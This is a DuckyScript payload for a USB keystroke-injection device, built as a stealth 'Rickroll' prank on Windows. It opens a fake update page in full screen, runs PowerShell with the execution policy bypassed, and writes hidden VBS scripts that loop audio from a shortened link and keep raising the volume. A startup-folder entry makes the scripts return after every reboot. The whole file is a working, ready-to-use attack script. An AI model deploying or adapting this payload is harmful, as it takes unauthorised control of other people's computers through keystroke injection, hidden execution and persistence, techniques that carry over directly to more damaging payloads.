REM Ultra-Stable Rickroll Stealth - Final Verified
DEFAULT_DELAY 100
DELAY 1000

GUI r
DELAY 500
STRING https://fakeupdate.net/win10ue/
ENTER
DELAY 800
F11
DELAY 200

GUI r
DELAY 300
STRING powershell -NoProfile -ExecutionPolicy Bypass
ENTER
DELAY 200

REM Send the entire script as one pasted command
STRING $d="$env:LOCALAPPDATA\SysCache"; if(!(Test-Path $d)){md $d 2>$null}; $a="$d\a.vbs"; $v="$d\v.vbs"; $s="$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\BootSync.vbs"; $r=[Environment]::GetFolderPath('Desktop'); 
ENTER

DELAY 20
STRING 'do:set w=CreateObject("WMPlayer.OCX"):w.URL="https://bit.ly/4blfCJQ":w.controls.play:while w.playState<>1:wscript.sleep 50:wend:w.close:wscript.sleep 200:loop' > $a; 
ENTER

DELAY 20
STRING 'do:CreateObject("WScript.Shell").SendKeys(chr(175)):wscript.sleep 5000:loop' > $v;
ENTER

DELAY 20
STRING 'CreateObject("WScript.Shell").Run "wscript.exe //B """ + $a + """",0:CreateObject("WScript.Shell").Run "wscript.exe //B """ + $v + """",0' > $s;
ENTER

DELAY 20
STRING Start-Process wscript.exe -ArgumentList '//B',$a -WindowStyle Hidden; Start-Process wscript.exe -ArgumentList '//B',$v -WindowStyle Hidden;
ENTER

DELAY 20
REM FIX: Use escaped quotes and single line with line breaks
STRING $b='@echo off' + [char]10 + 'taskkill /f /im wscript.exe >nul 2>&1' + [char]10 + 'timeout /t 1 /nobreak >nul' + [char]10 + 'del /f /q "' + $s + '" >nul 2>&1' + [char]10 + 'rd /s /q "' + $d + '" >nul 2>&1' + [char]10 + 'echo Cleanup complete. Rickroll terminated.' + [char]10 + 'pause' + [char]10 + 'del "%~f0"'; $b | Out-File "$r\EMERGENCY_STOP.bat" -Encoding ASCII;
ENTER

DELAY 20
STRING exit
ENTER